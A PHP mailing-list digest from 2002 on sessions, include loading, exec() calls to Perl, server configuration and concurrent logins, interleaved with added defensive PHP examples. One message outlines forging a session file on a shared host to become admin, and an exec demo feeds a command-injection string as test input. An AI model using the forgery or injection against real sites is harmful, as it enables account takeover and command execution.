    If we're on a virtual server, why can't I just open the session.save_path with PHP and read all of the files. Determine which one is yours and try to determine which variables you are saving. Say you are setting $_SESSION['logged_in'] = 1 and $_SESSION['admin'] = "Yes". Then your session file will look like a serialized version of the $_SESSION array.

    So say I figure out which ones are yours. I use a PHP script to write my own bad_session_file.whatever in the session folder. Then I call up your web page with www.example.com?PHPSESSID=bad_session_file and PHP will load up the session file I just created and make me an admin...

    Like I said, I haven't tested it though. Safe mode might protect against this, not sure. Anyone have any experience here?

    ---John Holmes...
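A defensive check for the shared-host scenario raised in the message above, added here and not part of the thread: it reports whether the directory PHP keeps session files in is open to other accounts. The function name and the scratch directory are assumptions; the "N;" and "N;MODE;" prefixes that session.save_path may carry are stripped before the directory is examined.

```php
<?php
declare(strict_types=1);

/**
 * Audit a session.save_path value; returns a list of findings
 * (an empty array means none of these checks fired).
 * Only the top-level directory and the files directly in it are examined.
 */
function auditSessionSavePath(string $savePath): array
{
    // The setting may read "N;/path" or "N;MODE;/path"; the directory is the last field.
    $fields = explode(';', $savePath);
    $dir = (string) end($fields);
    if ($dir === '') {
        $dir = sys_get_temp_dir();   // empty setting: the files handler uses the temp dir
    }
    if (!is_dir($dir)) {
        return ["$dir is not a directory"];
    }

    clearstatcache();
    $findings = [];
    $mode = fileperms($dir) & 0777;
    if ($mode & 0004) {
        $findings[] = "$dir: other accounts can list session files";
    }
    if ($mode & 0002) {
        $findings[] = "$dir: other accounts can create files here";
    }
    if (function_exists('posix_geteuid') && fileowner($dir) !== posix_geteuid()) {
        $findings[] = "$dir: shared directory, not owned by the account PHP runs as";
    }
    foreach (glob($dir . '/sess_*') ?: [] as $file) {
        if (fileperms($file) & 0044) {
            $findings[] = basename($file) . ': readable by group or other accounts';
        }
    }
    // Mode bits only separate different accounts. Where every site runs under the
    // same web-server account, a per-site directory also needs open_basedir (or a
    // similar restriction) to keep other sites' scripts out of it.
    return $findings;
}

// Constructed demo: a scratch directory first left open, then locked down.
$demo = sys_get_temp_dir() . '/sess_audit_' . bin2hex(random_bytes(4));
mkdir($demo);
$file = $demo . '/sess_constructedexample';
file_put_contents($file, 'logged_in|i:1;');          // serialized $_SESSION['logged_in'] = 1
chmod($demo, 0777);
chmod($file, 0644);
print_r(auditSessionSavePath('1;600;' . $demo));     // "N;MODE;/path" form

chmod($demo, 0700);
chmod($file, 0600);
print_r(auditSessionSavePath($demo));

unlink($file);
rmdir($demo);
```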

    attached mail follows:


    OK, if I understand C++ correctly, if I write a program and #include <iostream.h> or something similar and compile the program it only compiles with the used functions in it, right? So, if I never use 'cin' it leaves that function out of the final compiled app.

    Does/can PHP do anything similar? I'm always much more comfortable with a language when I can understand how it works and I'm sure some of you feel the same.

    Now, I fully understand that PHP documents are not even close to being compiled in the traditional sense. But, I'm wondering if it pulls all the necessary functions into memory when the page is accessed, then uses them when needed, or does it pull the whole include()d file into memory and just combine the whole mess together into one big memory heap and run like that?

    My gut tells me that it's the second one, but I'm just wanting to be sure. Of course, the answer likely won't make a single difference in my life, but I'm just curious... Also, I hope the above question isn't stupid. I do have a habit of thinking about something for a while and then having it suddenly hit me later that the answer is simple very trivial. Ah, well...

    Thanks for humoring me.
    Michael

    -----Original Message-----
    From: Monty [mailto:monty3hotmail.com]
    Sent: Tuesday, July 16, 2002 5:44 PM
    To: php-generallists.php.net
    Subject: Re: [PHP] Newbie Question on Efficiency

    If you have a large number of functions, it might be better to separate them into a few files that you can include as needed. I use one file that contains functions needed by every page. I have a few other files that contain functions that aren't needed by every page, so, I include them only on pages that need them. But most functions go in the main include file used on every page.

    Separating them will also minimize some overhead if you have a lot of functions. Otherwise, if your include files aren't War & Peace in length, one include file is fine.

    >>>> mek2600realitycodec.net 07/16/02 04:59PM >>>
    > Hello everyone, I'm a newbie and have a question on style that I've not
    > seen addressed anywhere. I have a large number of frequently used
    > functions that I'm trying to find a good way to organize. The method
    > I'm thinking of using is to simply create a .php file called, for
    > example, functions.php. Then, just include the file at the top of each
    > page that needs any of the functions, and just call them as needed. My
    > question is this- if that file gets very large with tons of different
    > functions, is that an inefficient method? I'm not entirely clear on how
    > PHP is parsed and passed to the client. I assume it would be best to
    > divide up the functions into multiple files (ex. dbfunctions.php, etc.),
    > but is that still the best method? Basically, I'm just curious on how
    > you guys handle things like this.
    >
    > Thanks in advance.
    > Michael Kennedy

    -- 
    PHP General Mailing List (http://www.php.net/)
    To unsubscribe, visit: http://www.php.net/unsub.php
    

    attached mail follows:


    PHP loads everything up before it starts doing anything. It's only going to execute the code it needs to, though, of course. I asked this question a while ago and got that answer. The process of loading all of the code is minimal, though, compared to actually executing the code.

    ---John Holmes...

    > -----Original Message-----
    > From: Michael Kennedy [mailto:mek2600realitycodec.net]
    > Sent: Tuesday, July 16, 2002 7:26 PM
    > To: php-generallists.php.net
    > Subject: RE: [PHP] Newbie Question on Efficiency : Follow-up Question
    >
    > OK, if I understand C++ correctly, if I write a program and #include
    > <iostream.h> or something similar and compile the program it only
    > compiles with the used functions in it, right? So, if I never use 'cin'
    > it leaves that function out of the final compiled app.
    >
    > Does/can PHP do anything similar? I'm always much more comfortable with
    > a language when I can understand how it works and I'm sure some of you
    > feel the same.
    >
    > Now, I fully understand that PHP documents are not even close to being
    > compiled in the traditional sense. But, I'm wondering if it pulls all
    > the necessary functions into memory when the page is accessed, then uses
    > them when needed, or does it pull the whole include()d file into memory
    > and just combine the whole mess together into one big memory heap and
    > run like that?
    >
    > My gut tells me that it's the second one, but I'm just wanting to be
    > sure. Of course, the answer likely won't make a single difference in my
    > life, but I'm just curious... Also, I hope the above question isn't
    > stupid. I do have a habit of thinking about something for a while and
    > then having it suddenly hit me later that the answer is simple very
    > trivial. Ah, well...
    >
    > Thanks for humoring me.
    > Michael
    >
    > -----Original Message-----
    > From: Monty [mailto:monty3hotmail.com]
    > Sent: Tuesday, July 16, 2002 5:44 PM
    > To: php-generallists.php.net
    > Subject: Re: [PHP] Newbie Question on Efficiency
    >
    > If you have a large number of functions, it might be better to separate
    > them into a few files that you can include as needed. I use one file that
    > contains functions needed by every page. I have a few other files that
    > contain functions that aren't needed by every page, so, I include them only
    > on pages that need them. But most functions go in the main include file used
    > on every page.
    >
    > Separating them will also minimize some overhead if you have a lot of
    > functions. Otherwise, if your include files aren't War & Peace in length,
    > one include file is fine.
    >
    > >>>> mek2600realitycodec.net 07/16/02 04:59PM >>>
    > > Hello everyone, I'm a newbie and have a question on style that I've not
    > > seen addressed anywhere. I have a large number of frequently used
    > > functions that I'm trying to find a good way to organize. The method
    > > I'm thinking of using is to simply create a .php file called, for
    > > example, functions.php. Then, just include the file at the top of each
    > > page that needs any of the functions, and just call them as needed. My
    > > question is this- if that file gets very large with tons of different
    > > functions, is that an inefficient method? I'm not entirely clear on how
    > > PHP is parsed and passed to the client. I assume it would be best to
    > > divide up the functions into multiple files (ex. dbfunctions.php, etc.),
    > > but is that still the best method? Basically, I'm just curious on how
    > > you guys handle things like this.
    > >
    > > Thanks in advance.
    > > Michael Kennedy

    attached mail follows:


    On Tue, Jul 16, 2002 at 06:25:42PM -0500, Michael Kennedy wrote:
    > OK, if I understand C++ correctly, if I write a program and #include
    > <iostream.h> or something similar and compile the program it only
    > compiles with the used functions in it, right? So, if I never use 'cin'
    > it leaves that function out of the final compiled app.
    >
    > Does/can PHP do anything similar?

    Nope. Everything is brought into memory at compile time. Or at least that's the way I understood it to be. I suspect it's still the case.

    --Dan

    -- 
                   PHP classes that make web design easier
            SQL Solution  |   Layout Solution   |  Form Solution
        sqlsolution.info  | layoutsolution.info |  formsolution.info
     T H E   A N A L Y S I S   A N D   S O L U T I O N S   C O M P A N Y
     4015 7 Av #4AJ, Brooklyn NY     v: 718-854-0335     f: 718-854-0409
    

    attached mail follows:


    Yeah, that's what I figured. With C++ you could find evidence that it only grabbed the used portions, but in PHP I didn't see anything to support that. Of course, like I said, the answer likely wouldn't have made a difference in anything I did, but it's nice to delve a little deeper sometimes. Thanks.

    Michael

    -----Original Message-----
    From: John Holmes [mailto:holmes072000charter.net]
    Sent: Tuesday, July 16, 2002 8:05 PM
    To: mek2600charter.net; php-generallists.php.net
    Subject: RE: [PHP] Newbie Question on Efficiency : Follow-up Question

    PHP loads everything up before it starts doing anything. It's only going to execute the code it needs to, though, of course. I asked this question a while ago and got that answer. The process of loading all of the code is minimal, though, compared to actually executing the code.

    ---John Holmes...


    attached mail follows:


    The only reason a compiled language would not include a function/module/etc is to reduce the size of the final executable.

    Since php doesn't store (barring the caching engines, but they work differently anyway) a compiled version, it doesn't need to worry about not including something.

    Martin

    -----Original Message-----
    From: Michael Kennedy [mailto:mek2600realitycodec.net]
    Sent: Wednesday, July 17, 2002 1:36 PM
    To: php-generallists.php.net
    Subject: RE: [PHP] Newbie Question on Efficiency : Follow-up Question

    Yeah, that's what I figured. With C++ you could find evidence that it only grabbed the used portions, but in PHP I didn't see anything to support that. Of course, like I said, the answer likely wouldn't have made a difference in anything I did, but it's nice to delve a little deeper sometimes. Thanks.

    Michael


    attached mail follows:


    Exactly- I could see uses in PHP, but they're so limited that it's obvious to see why it works the way it does.

    Michael Kennedy

    -----Original Message-----
    From: Martin Towell [mailto:martin.towellworld.net]
    Sent: Tuesday, July 16, 2002 10:46 PM
    To: 'mek2600charter.net'; php-generallists.php.net
    Subject: RE: [PHP] Newbie Question on Efficiency : Follow-up Question

    The only reason a compiled language would not include a function/module/etc is to reduce the size of the final executable.

    Since php doesn't store (barring the caching engines, but they work differently anyway) a compiled version, it doesn't need to worry about not including something.

    Martin


    attached mail follows:


    Hello ,

    I am trying to call a cgi script from a PHP script and get it to return some data. I am using the script below but it does not seem to work. The cgi script (or I should say function) I am trying to call is in a perl pm file. I have included a copy of the function I am trying to call. Does anybody know what I am doing wrong?

    $username= "sdfsfs";
    $cmd="/usr/lib/perl5/site_perl/5.005/Email.pm::mail_virtuser_get_byuser $username";
    $returndata=exec($cmd);
    echo $returndata;

    sub mail_virtuser_get_byuser
    # Parses a list of aliases a user owns
    # Arguments: username
    # Return value: Array of aliases
    {
        my($username) = @_;
        my(%virtuser) = Email::mail_virtuser_list_alias();
        my($alias,$user,@alii);
        foreach $alias (keys %virtuser) {
            push(@alii,$alias) if ($virtuser{$alias} eq $username);
        }
        return(@alii);
    }

    -- 
    Best regards,
     rdkurth                          mailto:rdkurthstarband.net
    

    attached mail follows:


    How about using the virtual() function?

    www.php.net/virtual

    ---John Holmes...

    > -----Original Message-----
    > From: rdkurthstarband.net [mailto:rdkurthstarband.net]
    > Sent: Tuesday, July 16, 2002 7:57 PM
    > To: php-general
    > Subject: [PHP] calling a cgi script from php
    >
    > Hello ,
    >
    > I am trying to call a cgi script from a PHP script and get it to return
    > some data.
    > I am using the script below but it does not seem to work.
    > The cgi script (or I should say function) I am trying to call is in a
    > perl pm file. I have included a copy of the function I am trying to
    > call. Does anybody know what I am doing wrong?
    >
    > $username= "sdfsfs";
    > $cmd="/usr/lib/perl5/site_perl/5.005/Email.pm::mail_virtuser_get_byuser $username";
    > $returndata=exec($cmd);
    > echo $returndata;
    >
    > sub mail_virtuser_get_byuser
    > # Parses a list of aliases a user owns
    > # Arguments: username
    > # Return value: Array of aliases
    > {
    >     my($username) = @_;
    >     my(%virtuser) = Email::mail_virtuser_list_alias();
    >     my($alias,$user,@alii);
    >     foreach $alias (keys %virtuser) {
    >         push(@alii,$alias) if ($virtuser{$alias} eq $username);
    >     }
    >     return(@alii);
    > }
    >
    > --
    > Best regards,
    > rdkurth mailto:rdkurthstarband.net

    attached mail follows:


    On Wednesday 17 July 2002 07:57, rdkurthstarband.net wrote:
    > Hello ,
    >
    > I am trying to call a cgi script from a PHP script and get it to return
    > some data.
    > I am using the script below but it does not seem to work.
    > The cgi script (or I should say function) I am trying to call is in a
    > perl pm file. I have included a copy of the function I am trying to
    > call. Does anybody know what I am doing wrong?
    >
    > $username= "sdfsfs";
    > $cmd="/usr/lib/perl5/site_perl/5.005/Email.pm::mail_virtuser_get_byuser $username";
    > $returndata=exec($cmd);
    > echo $returndata;

    What _should_ your perl script return? Also RTFM for exec().

    -- 
    Jason Wong -> Gremlins Associates -> www.gremlins.com.hk
    Open Source Software Systems Integrators
    * Web Design & Hosting * Internet & Intranet Applications Development *
    

    /* Prediction is very difficult, especially of the future. -- Niels Bohr */
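
    One way to make the call rdkurth is after, as an added example that is not code from the thread: exec() needs a real command line, so the module is loaded by the perl interpreter and the username travels as a separately quoted argument. It assumes a Unix host with perl on the PATH and Email.pm on perl's @INC; the PHP function names are hypothetical.

```php
<?php
// Added example, not code from the thread.
// Assumptions: Unix host, "perl" on the PATH, Email.pm reachable through @INC.

/**
 * Build the shell command line. Data is passed as its own quoted argument
 * and read from @ARGV; it is never spliced into the Perl source text.
 */
function build_alias_command($username)
{
    // Calls the module function quoted in the thread and prints one alias per line.
    $perl = 'print join("\n", Email::mail_virtuser_get_byuser($ARGV[0])), "\n";';

    // "--" ends perl's own option parsing, so a username that starts with "-"
    // cannot be taken for an interpreter switch.
    return 'perl -MEmail -e ' . escapeshellarg($perl)
         . ' -- ' . escapeshellarg($username);
}

/**
 * Return the aliases owned by $username as an array, or false on failure.
 */
function get_aliases($username)
{
    // Refuse anything that does not look like an account name before a
    // process is started at all (the pattern is an assumption about this site).
    if (!preg_match('/^[A-Za-z0-9._-]{1,64}$/', $username)) {
        return false;
    }

    $lines  = array();
    $status = 0;
    // The return value of exec() is only the LAST line of output. The second
    // argument collects every line, the third receives the exit status.
    exec(build_alias_command($username), $lines, $status);

    if ($status !== 0) {
        error_log('alias lookup failed with exit status ' . $status);
        return false;
    }

    // Drop the empty line printed when the user owns no aliases.
    return array_values(array_filter($lines, 'strlen'));
}

// Constructed input containing shell metacharacters. The whitelist refuses it,
// and the command line shows that it would reach perl as one literal argument.
$hostile = 'bob; echo injected';
var_dump(get_aliases($hostile));
echo build_alias_command($hostile), "\n";

// Normal use, with the username from the original question.
$aliases = get_aliases('sdfsfs');
if ($aliases !== false) {
    echo implode("\n", $aliases), "\n";
}
```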

    attached mail follows:


    Lo all,

    If I have say 20 web servers in a cluster behind something like a Cisco LocalDirector, will session data remain constant over the 20 web servers if they use a shared NFS or similar mount to save session data on?

    --
    me
    

    attached mail follows:


    Hi

    At 02:05 AM 17/07/2002 +0200, you wrote:
    >Lo all,
    >
    >If I have say 20 web servers in a cluster behind something like a Cisco
    >LocalDirector, will session data remain constant over the 20 web servers if
    >they use a shared NFS or similar mount to save session data on?

    Have a look at msession at http://www.mohawksoft.com/phoenix/
    It works very well, I would not run the patch on the standard php session code as it seems to cause problems if you want to switch between session types. (at least on my setup php-4.2.1 apache linux)
    I have a class to manipulate msession as a user session if you need it.

    Tom

    attached mail follows:


    > >If I have say 20 web servers in a cluster behind something like a Cisco
    > >LocalDirector, will session data remain constant over the 20 web servers if
    > >they use a shared NFS or similar mount to save session data on?
    > Have a look at msession at http://www.mohawksoft.com/phoenix/
    > It works very well, I would not run the patch on the standard php session
    > code as it seems to cause problems if you want to switch between session
    > types. (at least on my setup php-4.2.1 apache linux)
    > I have a class to manipulate msession as a user session if you need it.

    I'll have a look at it...

    I'd definitely need something that is server side however. People doing PHP code, and hosting it on these "clusters" do not even know that their sites are on clusters. The content is uploaded on servers that do not even have web servers on them, all sorts of very nifty advanced stuff.

    By your reply however, I take it simply using a "shared" directory for session data isn't going to work?

    --
    me
    

    attached mail follows:


    Howdy all..
    does any one know of another place i can download a win32 ver of mcrypt other than
    http://mcrypt.hellug.gr/ ?

    as that site crashes my browser when i click any link on the page...

    Cheers

    Peter
    "the only dumb question is the one that wasn't asked"

    attached mail follows:


    ftp://mcrypt.hellug.gr/pub/crypto/mcrypt/

    ----- Original Message -----
    From: "Peter" <phpvfsa.com.au>
    To: "php_gen" <php-generallists.php.net>
    Sent: Wednesday, July 17, 2002 1:16 AM
    Subject: [PHP] mcrypt

    > Howdy all..
    > does any one know of another place i can download a win32 ver of mcrypt other than
    > http://mcrypt.hellug.gr/ ?
    >
    > as that site crashes my browser when i click any link on the page...
    >
    > Cheers
    >
    > Peter
    > "the only dumb question is the one that wasn't asked"
    >

    attached mail follows:


    On Tue, Jul 16, 2002 at 11:08:19AM -0400, Conover, Ryan wrote:
    >
    > I am trying to do a simple fopen("http://www.weather.com/index.html", "r");
    > For some reason I cannot Open any URL's after trying several.
    >
    > Warning: stat failed for Resource id #1 (errno=2 - No such file or
    > directory)

    If you're getting a resource id, your fopen() worked fine. The failure is on some other line in your code. You need to pin down exactly which line it is.

    --Dan

    -- 
                   PHP classes that make web design easier
            SQL Solution  |   Layout Solution   |  Form Solution
        sqlsolution.info  | layoutsolution.info |  formsolution.info
     T H E   A N A L Y S I S   A N D   S O L U T I O N S   C O M P A N Y
     4015 7 Av #4AJ, Brooklyn NY     v: 718-854-0335     f: 718-854-0409
    

    attached mail follows:


    On Tue, Jul 16, 2002 at 01:45:01PM -0400, Michael Zornek wrote:
    >
    > I know this slight variation will make it work:
    >
    > echo "<p>" . $db->field('name_long');

    That's not an "object variable name." That's a function call. You're asking to echo "<p>" and then echoing the value returned by the field() function in the $db object when called with the 'name_long' argument.

    That's the way you have to do it.

    --Dan

    -- 
                   PHP classes that make web design easier
            SQL Solution  |   Layout Solution   |  Form Solution
        sqlsolution.info  | layoutsolution.info |  formsolution.info
     T H E   A N A L Y S I S   A N D   S O L U T I O N S   C O M P A N Y
     4015 7 Av #4AJ, Brooklyn NY     v: 718-854-0335     f: 718-854-0409
    

    attached mail follows:


    Sailom wrote:

    > I am a novice on PHP and web programming. Can any one suggest me if I can
    > use index.php in place of index.html? I really need to concern about

    Sure you can!

    If you're using an Apache webserver, create a file named .htaccess containing the following:

    DirectoryIndex index.php index.html
    Redirect index.html http://www.bar.net/index.php

    The first line says "the directory index file is index.php, not index.html". The second line says "whenever you get a request for index.html, send them index.php instead".

    > security issue too.

    Umm... *what*?

    -- 
    Mark Gallagher
    http://cyberfuddle.com/infinitebabble/
    

    attached mail follows:


    Why not just add it to the httpd.conf, this would allow it to work within the whole server
    And not just one directory / vhost etc....

    ---------------------------------------------------------------------------
    Chris Kay
    Technical Support - Techex Communications
    Website: www.techex.com.au Email: chris.kaytechex.net.au
    Telephone: 1300 88 111 2 - Fax: (02) 9970 5788
    Address: Suite 13, 5 Vuko Place, Warriewood, NSW 2102
    Platinum Channel Partner of the Year - Request DSL - Broadband for Business
    ---------------------------------------------------------------------------

    > -----Original Message-----
    > From: Mark Gallagher [mailto:markcyberfuddle.com]
    > Sent: Wednesday, 17 July 2002 4:05 AM
    > To: Sailom
    > Cc: php-generallists.php.net
    > Subject: Re: [PHP] Using index.php instead of index.html
    >
    >
    > Sailom wrote:
    >
    > > I am a novice on PHP and web programming. Can any one suggest me if
    > > I can use index.php in place of index.html? I really need to concern
    > > about
    >
    > Sure you can!
    >
    > If you're using an Apache webserver, create a file named .htaccess
    > containing the following:
    >
    > DirectoryIndex index.php index.html
    > Redirect index.html http://www.bar.net/index.php
    >
    > The first line says "the directory index file is index.php, not
    > index.html". The second line says "whenever you get a request for
    > index.html, send them index.php instead".
    >
    > > security issue too.
    >
    > Umm... *what*?
    >
    >
    > --
    > Mark Gallagher
    > http://cyberfuddle.com/infinitebabble/
    >
    >
    > --
    > PHP General Mailing List (http://www.php.net/)
    > To unsubscribe, visit: http://www.php.net/unsub.php
    >

    attached mail follows:


    > Why not just add it to the httpd.conf, this would allow it to work within the whole server
    > And not just one directory / vhost etc....

    Maybe he doesn't have access to alter server configurations? -eg-

    --
    me
    

    attached mail follows:


    The only security consideration here is whether you want to advertise the fact that you're using PHP or not. If not:

    DirectoryIndex index.html

    AddType application/x-httpd-php .html

    This is OK if most/all your pages use PHP. Otherwise, normal html gets parsed as well with unnecessary performance costs.

    Security through obscurity is not a good standalone policy, but every little bit can help.

    Michael

    On Wed, 17 Jul 2002, Mark Gallagher wrote:

    > Sailom wrote:
    >
    > > I am a novice on PHP and web programming. Can any one suggest me if I can
    > > use index.php in place of index.html? I really need to concern about
    >
    > Sure you can!
    >
    > If you're using an Apache webserver, create a file named .htaccess
    > containing the following:
    >
    > DirectoryIndex index.php index.html
    > Redirect index.html http://www.bar.net/index.php
    >
    > The first line says "the directory index file is index.php, not
    > index.html". The second line says "whenever you get a request for
    > index.html, send them index.php instead".
    >
    > > security issue too.
    >
    > Umm... *what*?
    >

    -- 
    --------------------------------
    n   i   n   t   i  .   c   o   m
    php-python-perl-mysql-postgresql
    --------------------------------
    Michael Hall     nintininti.com
    --------------------------------
    

    attached mail follows:


    On Wednesday 17 July 2002 10:57, Michael Hall wrote:
    > The only security consideration here is whether you want to advertise the
    > fact that you're using PHP or not. If not:
    >
    > DirectoryIndex index.html
    >
    > AddType application/x-httpd-php .html

    If you don't want people to know you're using PHP then you need to at least disable "expose_php" in php.ini. Also depending on your error reporting settings, any error _may_ potentially advertise the fact that you're using PHP.

    -- 
    Jason Wong -> Gremlins Associates -> www.gremlins.com.hk
    Open Source Software Systems Integrators
    * Web Design & Hosting * Internet & Intranet Applications Development *
    

    /* Software production is assumed to be a line function, but it is run like a staff function. -- Paul Licker */
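
    A self-check for the three giveaways named in this thread (the X-Powered-By header, the expose_php setting, and error text reaching the browser), as an added example that is not code from the thread. The function names are hypothetical, and the sample header and error message are the ones quoted elsewhere in this digest.

```php
<?php
// Added example, not code from the thread. Function names are hypothetical.

// php.ini switches arrive from ini_get() as strings such as "1", "On", "" or
// "Off"; display_errors may also be "stdout" or "stderr".
function ini_enabled($value)
{
    return in_array(strtolower(trim((string)$value)),
                    array('1', 'on', 'yes', 'true', 'stdout', 'stderr'), true);
}

/**
 * $headers: response header lines, e.g. the result of headers_list()
 * $ini:     array('expose_php' => ..., 'display_errors' => ...)
 * $body:    response body to scan for PHP's default error format
 * Returns a list of human-readable findings (empty when nothing leaks).
 */
function php_disclosure_findings(array $headers, array $ini, $body = '')
{
    $findings = array();

    foreach ($headers as $line) {
        if (preg_match('/^X-Powered-By:\s*(PHP\S*)/i', $line, $m)) {
            $findings[] = 'response header reveals ' . $m[1];
        }
    }
    if (isset($ini['expose_php']) && ini_enabled($ini['expose_php'])) {
        $findings[] = 'expose_php is enabled in php.ini';
    }
    if (isset($ini['display_errors']) && ini_enabled($ini['display_errors'])) {
        $findings[] = 'display_errors is enabled: error text is sent to the browser';
    }

    // Default error layout: "Fatal error: <message> in <file> on line <n>",
    // usually wrapped in <b> tags, so the markup is stripped first.
    $text = strip_tags($body);
    if (preg_match('/\b(Fatal error|Parse error|Warning|Notice): .+? in (\S+) on line \d+/s',
                   $text, $m)) {
        $findings[] = 'page body contains a PHP ' . strtolower($m[1])
                    . ' naming ' . $m[2];
    }
    return $findings;
}

// Constructed response: a page served under a .html name that still gives
// PHP away. Header and error text are copied from messages in this digest.
$sampleHeaders = array('X-Powered-By: PHP/4.2.1', 'Content-type: text/html');
$sampleBody    = '<b>Fatal error</b>: Cannot break/continue 1 levels in '
               . '<b>/home/igraph/public_html/rhc/inforeq.php</b> on line <b>82</b>';
print_r(php_disclosure_findings(
    $sampleHeaders,
    array('expose_php' => 'On', 'display_errors' => '1'),
    $sampleBody
));

// The same check against the interpreter running this script.
print_r(php_disclosure_findings(
    headers_list(),
    array('expose_php'     => ini_get('expose_php'),
          'display_errors' => ini_get('display_errors'))
));
```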

    attached mail follows:


    On Tue, Jul 16, 2002 at 01:57:51PM -0400, Monty wrote:
    > Is there a standard method in PHP for preventing multiple people from using
    > the same log-in username/password simultaneously on a membership site? Any
    > suggestions are greatly appreciated.

    My session management system uses a database backend. Each hit updates a timestamp in the database, among other things. If the time of the new hit is too long since the last hit, it denies access.

    Now, if a person logs in again and their User ID is in the session table, that means either their old session timed out or they're being hijacked. Either way, terminate the old session and move what they were doing into the new session.

    THEN, if the person in the first session is still browsing, they'll get a message saying their session was terminated. They'll be prompted for a login. That successful login will terminate the second session.

    --Dan

    --
                   PHP classes that make web design easier
            SQL Solution  |   Layout Solution   |  Form Solution
        sqlsolution.info  | layoutsolution.info |  formsolution.info
     T H E   A N A L Y S I S   A N D   S O L U T I O N S   C O M P A N Y
     4015 7 Av #4AJ, Brooklyn NY     v: 718-854-0335     f: 718-854-0409
    

    attached mail follows:


    I agree. Using a database is usually a good way of storing session information. But as noted by Dennis below, automatic logout may require additional scripts running in the background. This is a bit inferior in PHP compared to ASP. In ASP, support for automatic session destruction is implemented by having a "magic" function (called Session_End) which will be called automagically by the web server whenever a session expires. Having this in PHP would be very nice too!

    /lasso (lassolassoweb.nu)

    Dennis Moore wrote:
    > If you do not want to use cookies and use SID or trans SID; Another method is
    > to track your logins via a database. This can be resource intensive
    > though. You need to update the database upon each click or have an empty
    > window refresh every 1-5 minutes. If there is no activity for 15 or 30
    > minutes automatically log the person off in the database. This requires a
    > process to run in cron or a separate background program. The advantage of
    > this is that is very easy to add time based accounting to the session
    > management system.
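
    The scheme Dan describes above (one row per user, a timestamp refreshed on each hit, a new login displacing the old session), as an added example that is not code from the thread. It assumes PHP 7+ with the pdo_sqlite extension; the table, column and function names are hypothetical, and idle sessions are expired lazily on their next hit rather than by a cron job.

```php
<?php
// Added example, not code from the thread.
// Assumptions: PHP 7+, pdo_sqlite; all names below are hypothetical.

const IDLE_LIMIT = 900; // seconds without a hit before a session is refused

function open_store()
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // user_id is the primary key, so a user can never hold two live rows.
    $db->exec('CREATE TABLE sessions (
        user_id    INTEGER PRIMARY KEY,
        session_id TEXT    NOT NULL UNIQUE,
        last_hit   INTEGER NOT NULL,
        state      TEXT    NOT NULL DEFAULT \'\'
    )');
    return $db;
}

// Call only after the password check has succeeded. Any earlier session for
// this user is terminated and its saved state is moved into the new one.
function login(PDO $db, $userId, $now)
{
    $db->beginTransaction();

    $old = $db->prepare('SELECT state FROM sessions WHERE user_id = ?');
    $old->execute(array($userId));
    $state = $old->fetchColumn();
    if ($state === false) {
        $state = '';                       // no earlier session to carry over
    }

    $db->prepare('DELETE FROM sessions WHERE user_id = ?')
       ->execute(array($userId));

    $sid = bin2hex(random_bytes(16));      // unguessable session identifier
    $db->prepare('INSERT INTO sessions (user_id, session_id, last_hit, state)
                  VALUES (?, ?, ?, ?)')
       ->execute(array($userId, $sid, $now, $state));

    $db->commit();
    return $sid;
}

// Call on every hit. Returns:
//   'ok'         - session is live; its timestamp has been refreshed
//   'expired'    - too long since the last hit; row removed, ask for a login
//   'terminated' - no such session (displaced by a newer login, or never issued)
function check_hit(PDO $db, $sid, $now)
{
    $q = $db->prepare('SELECT last_hit FROM sessions WHERE session_id = ?');
    $q->execute(array($sid));
    $lastHit = $q->fetchColumn();

    if ($lastHit === false) {
        return 'terminated';
    }
    if ($now - (int)$lastHit > IDLE_LIMIT) {
        $db->prepare('DELETE FROM sessions WHERE session_id = ?')
           ->execute(array($sid));
        return 'expired';
    }
    $db->prepare('UPDATE sessions SET last_hit = ? WHERE session_id = ?')
       ->execute(array($now, $sid));
    return 'ok';
}

// Constructed walk-through: two browsers sharing the account with user id 42.
$db = open_store();
$t  = 1026900000;                          // constructed Unix timestamp

$first = login($db, 42, $t);
echo check_hit($db, $first, $t + 60), "\n";          // first browser, active

$second = login($db, 42, $t + 120);                  // same account, second browser
echo check_hit($db, $first,  $t + 130), "\n";        // first browser's next hit
echo check_hit($db, $second, $t + 130), "\n";        // second browser's next hit

// Second browser comes back after more than IDLE_LIMIT seconds of silence.
echo check_hit($db, $second, $t + 130 + IDLE_LIMIT + 1), "\n";
```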

    attached mail follows:


    I'm creating an HTML file that will be printed by my website users. I've noticed that most browsers have the default print margins set to 0.75". Is there any way to change the print margins to 0.25"?


    attached mail follows:


    You can't change this type of setting on a client's browser. The only way you'd be able to do this is to tell the user that the page prints best when margins are set to 0.25"

    -----Original Message-----
    From: Manuel [mailto:manuelochoa-usa.com]
    Sent: Wednesday, July 17, 2002 10:52 AM
    To: PHP General
    Subject: [PHP] Printer margins

    I'm creating an HTML file that will be printed by my website users. I've noticed that most browsers have the default print margins set to 0.75". Is there any way to change the print margins to 0.25"?


    attached mail follows:


    We've installed and recompiled PHP but I still get "undefined function" errors when I try to use imap_open().

    Does anybody have any ideas?

    Thanks,

    Jeff


    attached mail follows:


    On Wednesday 17 July 2002 10:14, Jeff Schwartz wrote:
    > We've installed and recompiled PHP but I still get "undefined function"
    > errors when I try to use imap_open().
    >
    > Does anybody have any ideas?

    1) Have you installed the imap libraries?

    2) Did you configure php to compile with imap support?

    -- 
    Jason Wong -> Gremlins Associates -> www.gremlins.com.hk
    Open Source Software Systems Integrators
    * Web Design & Hosting * Internet & Intranet Applications Development *
    

    /* When your work speaks for itself, don't interrupt. -- Henry J. Kaiser */

    attached mail follows:


    The most important difference is, I believe, whether you use apxs during compilation or not.

    Using ./configure --with-apxs will build a DSO module, leaving --with-apxs out will build a standalone module.

    There may be more to it than that, though.

    Michael

    On Tue, 16 Jul 2002, Andy wrote:

    > sounds logical, but what happens with my other php version, where I need the
    > flags? will it still be working? And where is this standalone php version
    > gonna be installed?
    >
    > Andy
    >
    >
    > "Jason Wong" <php-generalgremlins.com.hk> wrote in message
    > news:200207162348.35817.php-generalgremlins.com.hk...
    > > On Tuesday 16 July 2002 23:36, Andy wrote:
    > > > so how do you install a second php version?? If you compile it (besides
    > > > with what kind of flags) and then do a make and a make install the original
    > > > version will be replaced, right?
    > >
    > > Just doing:
    > >
    > > ./configure; make; make install
    > >
    > > will compile and install the standalone php binary by default.
    > >
    > > Add whatever other options you need to the ./configure command. It's all in
    > > the manual.
    > >
    > > --
    > > Jason Wong -> Gremlins Associates -> www.gremlins.com.hk
    > > Open Source Software Systems Integrators
    > > * Web Design & Hosting * Internet & Intranet Applications Development *
    > >
